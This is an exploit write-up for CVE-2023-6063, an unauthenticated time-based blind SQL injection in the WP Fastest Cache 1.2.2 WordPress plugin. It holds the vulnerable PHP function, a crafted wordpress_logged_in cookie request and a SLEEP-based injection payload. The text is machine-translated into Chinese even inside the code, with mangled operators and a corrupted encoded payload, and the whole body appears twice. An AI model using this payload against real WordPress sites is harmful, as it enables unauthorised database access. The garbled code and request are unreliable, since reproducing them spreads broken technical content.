#利用标题:未经验证的SQL注入WP最快的缓存1.2.2
#日期: 14.11.2023
#利用作者: MeryemTaşkın
#供应商homepage: https://www.wpfastestcache.com/
#软件link: https://wordpress.org/plugins/wp-fastest-cache/
#版本: WP最快的高速缓存1.2.2
#测试在: WP最快的缓存1.2.2
#CVE: CVE-2023-6063
## 描述
WP最快的高速缓存插件的1.2.2版中存在SQL注入漏洞,从而使攻击者无需认证就可以在系统上触发SQL查询。
## VULN代码
public函数is_user_admin(){
全球$ WPDB;
foreach((array)$ _ cookie as $ cookie_key=$ cookie_value){
if(preg_match('/wordpress_logged_in/i',$ cookie_key)){
$ username=preg_replace('/^([^\ |]+)\ |。+/','$ 1',$ cookie_value);
休息;
}
}
if(isset($ username)$ username){
$ res=$ wpdb-get_var('select $ wpdb-users`.`.
来自“ $ wpdb-users”
内部加入
在“ $ wpdb-users”上
..
## 开发
获取/http/1.1
cookie: wordpress_logged_in_1=%22%20和20%20%28sect%201%20%20%28select%28sleep%285%29%29A%29A%29%29%20%和20%20%20%221%22%22%22%3DD%221
HOST: MERYEM.LOCAL
##参数: cookie#1*(((自定义)标头)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: wordpress_logged_in_dsadasdasd='and(select 3809 from(select(select(sleep(5)))rdvp)rdvp)和'hqdg'='hqdg
---
## 参考
- 原始研究人员:亚历克斯马云惹不起马云桑福德
-POC: MeryemTaşkın
#日期: 14.11.2023
#利用作者: MeryemTaşkın
#供应商homepage: https://www.wpfastestcache.com/
#软件link: https://wordpress.org/plugins/wp-fastest-cache/
#版本: WP最快的高速缓存1.2.2
#测试在: WP最快的缓存1.2.2
#CVE: CVE-2023-6063
## 描述
WP最快的高速缓存插件的1.2.2版中存在SQL注入漏洞,从而使攻击者无需认证就可以在系统上触发SQL查询。
## VULN代码
public函数is_user_admin(){
全球$ WPDB;
foreach((array)$ _ cookie as $ cookie_key=$ cookie_value){
if(preg_match('/wordpress_logged_in/i',$ cookie_key)){
$ username=preg_replace('/^([^\ |]+)\ |。+/','$ 1',$ cookie_value);
休息;
}
}
if(isset($ username)$ username){
$ res=$ wpdb-get_var('select $ wpdb-users`.`.
来自“ $ wpdb-users”
内部加入
$ wpdb-usermeta
在“ $ wpdb-users”上
..
## 开发
获取/http/1.1
cookie: wordpress_logged_in_1=%22%20和20%20%28sect%201%20%20%28select%28sleep%285%29%29A%29A%29%29%20%和20%20%20%221%22%22%22%3DD%221
HOST: MERYEM.LOCAL
##参数: cookie#1*(((自定义)标头)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: wordpress_logged_in_dsadasdasd='and(select 3809 from(select(select(sleep(5)))rdvp)rdvp)和'hqdg'='hqdg
---
## 参考
- [WPSCAN博客文章](https://wpscan.com/blog/unauthentic...rability-addressed-ind-wp-fastest-cache-1-2/)
- [WPSCAN漏洞](https://wpscan.com/vulnerability/30A74105-8ADE-4198-ABE2-1C6F2967443E/)
- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-6063)
- 原始研究人员:亚历克斯马云惹不起马云桑福德
-POC: MeryemTaşkın